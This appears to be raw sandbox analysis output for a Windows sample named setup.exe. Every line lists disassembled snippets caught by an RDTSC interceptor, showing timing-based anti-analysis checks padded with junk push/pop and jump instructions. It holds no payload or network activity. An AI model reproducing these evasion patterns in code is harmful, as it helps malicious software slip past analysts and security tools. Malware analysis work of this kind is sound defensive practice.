Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D915 second address: E3D95E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FF32CFB71F8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000004h 0x00000028 mov cl, 70h 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FF32CFB7202h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DD0F second address: E3DD19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF32CDD6566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DD19 second address: E3DD4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 0000001Eh 0x00000010 sub dword ptr [ebp+122D32D8h], ecx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF32CFB7201h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E72042 second address: E72051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7729E second address: E772BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7209h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E772BD second address: E772DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FF32CDD6574h 0x0000000b jo 00007FF32CDD6566h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E772DE second address: E772E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EEC second address: E77EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EF0 second address: E77EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EF4 second address: E77EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EFA second address: E77F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77F00 second address: E77F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780A1 second address: E780AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780AF second address: E780B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780B5 second address: E780B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780B9 second address: E780D3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF32CDD656Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780D3 second address: E780EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FF32CFB71FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnc 00007FF32CFB71F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7853D second address: E78550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E78550 second address: E7858B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CFB71F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF32CFB7200h 0x00000012 jne 00007FF32CFB7208h 0x00000018 jmp 00007FF32CFB7202h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7B8CA second address: E7B8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E829ED second address: E82A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A04 second address: E82A10 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF32CDD656Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A10 second address: E82A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A18 second address: E82A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A1E second address: E82A28 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF32CFB71F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8145C second address: E81477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6575h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81739 second address: E8173D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81CE2 second address: E81CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81CE8 second address: E81CF8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF32CFB71F6h 0x00000008 js 00007FF32CFB71F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81FC0 second address: E81FCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81FCF second address: E81FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FF32CFB71FEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82416 second address: E8241A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8241A second address: E8243A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7207h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8243A second address: E82440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8118A second address: E811A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7202h 0x00000007 jnp 00007FF32CFB71F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E811A6 second address: E811C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6576h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A458 second address: E8A45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89D1D second address: E89D52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF32CDD6576h 0x00000008 jmp 00007FF32CDD656Dh 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF32CDD656Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89D52 second address: E89D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89E84 second address: E89EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF32CDD6574h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF32CDD6574h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jbe 00007FF32CDD6566h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89EBE second address: E89EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89EC4 second address: E89EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF32CDD6576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A03A second address: E8A040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A040 second address: E8A051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FF32CDD6566h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A051 second address: E8A055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8CB32 second address: E8CB51 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF32CDD6566h 0x00000008 jg 00007FF32CDD6566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FF32CDD656Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8CB51 second address: E8CB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8CB58 second address: E8CB74 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD656Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FF32CDD6568h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93115 second address: E9311F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CFB71FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9311F second address: E93128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93558 second address: E93581 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF32CFB71F6h 0x00000008 jmp 00007FF32CFB7206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jp 00007FF32CFB71F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E936B4 second address: E936BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DBB0 second address: E3DC30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jno 00007FF32CFB720Dh 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FF32CFB71F8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b movsx ecx, cx 0x0000002e push 00000004h 0x00000030 mov edi, dword ptr [ebp+122D3394h] 0x00000036 nop 0x00000037 push edi 0x00000038 jmp 00007FF32CFB7201h 0x0000003d pop edi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF32CFB7203h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DC30 second address: E3DC36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93959 second address: E93963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF32CFB71F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93963 second address: E93983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF32CDD6570h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FF32CDD6566h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93983 second address: E93997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jnp 00007FF32CFB71F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E97E38 second address: E97E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E97E3C second address: E97E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF32CFB7201h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 jmp 00007FF32CFB71FAh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 jno 00007FF32CFB71F6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E97E75 second address: E97E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FF32CDD6566h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E982B4 second address: E982CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF32CFB71FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E982CC second address: E982D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9844F second address: E98466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E98466 second address: E98472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FF32CDD6566h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E98795 second address: E98799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9BD2C second address: E9BD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF32CDD6566h 0x0000000a jmp 00007FF32CDD656Dh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B534 second address: E9B53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B53A second address: E9B55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF32CDD6579h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B7CC second address: E9B7F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007FF32CFB7204h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B7F0 second address: E9B7FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 jp 00007FF32CDD656Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9BA74 second address: E9BA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA2DAA second address: EA2DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 jmp 00007FF32CDD656Bh 0x0000000e jmp 00007FF32CDD6576h 0x00000013 popad 0x00000014 jmp 00007FF32CDD6575h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA2DF0 second address: EA2DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA2FAE second address: EA2FB8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD656Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33C0 second address: EA33C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33C4 second address: EA33E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF32CDD6571h 0x0000000d js 00007FF32CDD6566h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33E3 second address: EA33F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33F4 second address: EA3412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6578h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA3412 second address: EA3423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CFB71FAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36C9 second address: EA36CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36CD second address: EA36EE instructions: 0x00000000 rdtsc 0x00000002 js 00007FF32CFB71F6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FF32CFB7203h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36EE second address: EA36F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36F5 second address: EA3718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB71FDh 0x00000009 jne 00007FF32CFB71F6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 jl 00007FF32CFB71FEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA3F66 second address: EA3F9D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6568h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jng 00007FF32CDD6566h 0x00000015 jmp 00007FF32CDD656Eh 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d jmp 00007FF32CDD6571h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA4810 second address: EA4820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FF32CFB71FAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA4820 second address: EA4838 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD6568h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007FF32CDD6566h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA4838 second address: EA484A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA484A second address: EA484E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA484E second address: EA485A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FF32CFB71F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA9AD0 second address: EA9ADD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA9ADD second address: EA9B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7202h 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007FF32CFB71FDh 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA9B07 second address: EA9B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
